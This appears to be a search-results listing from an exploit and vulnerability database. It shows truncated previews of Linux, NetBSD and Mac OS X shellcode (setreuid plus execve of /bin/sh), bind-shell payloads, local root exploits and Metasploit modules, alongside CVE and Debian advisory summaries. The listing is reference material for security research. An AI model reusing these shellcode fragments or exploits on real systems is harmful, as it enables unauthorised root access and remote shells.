1131 matches found
linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes
No description provided by source. / Linux/x86 setreuid0,0 + execve/bin/sh, /bin/sh, NULL - 33 bytes - [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \x31\xc9 // xor %ecx, %ecx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // pus...
Local Glibc shared library (.so) <= 2.11.1 exploit
No description provided by source. Exploit Title: Local Glibc shared library .so exploit Date: 07.04.10 Author: Rh0 [email protected] Software Link: NA Version: <= 2.11.1, higher not tested Tested on: Debian stable x86-64, Ubuntu 9.10 x86, Fedora 12 x86 CVE : NA Code : #!/bin/sh A lot of applications in...
Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (ppc)
No description provided by source. !/usr/bin/perl http://www.digitalmunition.com/FailureToLaunch-ppc.pl Code by Kevin Finisterre kflistsatdigitalmunitiondotcom Much appreciation goes to John H for all kindsa random shit like exploiting Veritas and other random things in the past core... where the...
97 bytes Linux x86 bind shell port 64533
No description provided by source. include stdio.h include string.h / I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team by Magnefikko 05.07.2010 [email protected] Promhyl Studies ::...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes
No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve/bin/sh, /bin/sh, NULL / char shellcode = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx \x68\x2f\x2f\x73\x68 // push $0x68732f2f...
MTools 3.9.x MFormat Privilege Escalation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9746/info It has been reported that mformat is prone to a privilege escalation vulnerability when installed as a setUID application. This issue is due to a design error allowing a user to create any arbitrary files as the...
Linux kernel <= 2.2.18 ptrace/execve Race Condition Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. A problem in the Linux Kernel could...
linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34 bytes
No description provided by source. / linux/x86 setreuidgeteuid,geteuid,execve/bin/sh,0,0 34byte universal shellcode blue9057 [email protected] / int main char shellcode=\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46 \x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68...
netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 30 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve/bin//sh, ..., NULL; / include sys/types.h include stdio.h include string.h char scode = \x31\xc0 // xor %eax,%eax \x50 // push %eax \x50 // push %eax \x50 // push %eax \x34\x7e // xo...
Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit
No description provided by source. / GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit. This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows a process to gain elevated...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
No description provided by source. / linux/x86 setreuid0, 0 + execve/bin/sh, /bin/sh, NULL, NULL - 31 bytes - izik [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx,%ebx \x31\xc9 // xor %ecx,%ecx \xcd\x80 // int $0x80 \x99 // cltd \xb0\x0b // mov...
Xorg 1.4 to 1.11.2 File Permission Change PoC
No description provided by source. / xchmod.c -- Xorg file permission change vulnerability PoC Author: vladz http://vladz.devzero.fr Date: 2011/12/15 Software: www.x.org Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USECHMOD preprocessor identifier Test...
CVE-2014-3880
CVE-2014-3880 affects the FreeBSD kernel: executing a new image can destroy the calling process’s virtual memory space before all threads terminate, dereferencing an invalid page table pointer and triggering a triple fault leading to a reboot. Affected: FreeBSD 8.4 (before p11), 9.1 (before p14),...
Debian DSA-2952-1 : kfreebsd-9 - security update
Several vulnerabilities have been discovered in the FreeBSD kernel that may lead to a denial of service or possibly disclosure of kernel memory. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2014-1453 A remote, authenticated attacker could cause the NF...
Debian Security Advisory DSA 2952-1 (kfreebsd-9 - security update)
Several vulnerabilities have been discovered in the FreeBSD kernel that may lead to a denial of service or possibly disclosure of kernel memory. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2014-1453 A remote, authenticated attacker could cause the NFS...
DSA-2952-1 kfreebsd-9 - security update
Bulletin has no description...
Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)
Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes). Shellcode exploit for Linux/x86 platform Title: Shellcode Linux x86 54Bytes Run /usr/bin/python | setreuid,execve Date: 8/5/2014 Author: Ali Razmjoo Tested on: kali-linux-1.0.4-i386 3.7-trunk-686-pae 1 SMP Debian 3.7.2-0+kali8 i686...
Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure
Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure Source: http://www.halfdog.net/Security/2012/LinuxKernelBinfmtScriptStackDataDisclosure/ Introduction Problem description: Linux kernel binfmt_script handling in combination with CONFIG_MODULES can lead to disclosure of kernel stac...
Linux Command Shell, Bind TCP Random Port Inline
Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 51...
Linux Command Shell, Bind TCP Random Port Inline
Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 57...